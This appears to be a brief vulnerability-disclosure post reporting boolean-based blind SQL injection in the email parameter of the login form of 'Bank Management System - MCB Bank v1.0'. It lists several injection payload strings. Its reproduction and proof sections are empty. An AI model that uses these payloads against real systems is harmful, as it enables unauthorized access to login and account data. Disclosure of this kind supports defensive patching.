Sunday, February 27, 2022

Bank Management System 1.0 SQL Injection

# Title: Bank Management System - MCB Bank v1.0 - SQLi
# Author: nu11secur1ty
# Date: 02.25.2022
# Vendor: by:Tariq Fareeds
# Software:
# Reference:

## Description:
The email parameter from Bank Management System - MCB Bank v1.0
appears to be vulnerable to SQL injection attacks.
The payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078--
were each submitted in the email parameter.
These two requests resulted in different responses, indicating that
the input is being incorporated into a SQL query in an unsafe way
WARNING: If this is in some external domain, or some subdomain
redirection, or internal whatever, this will be extremely dangerous!

[+] Payloads:

Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin=

## Reproduce:

## Proof and Exploit:


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore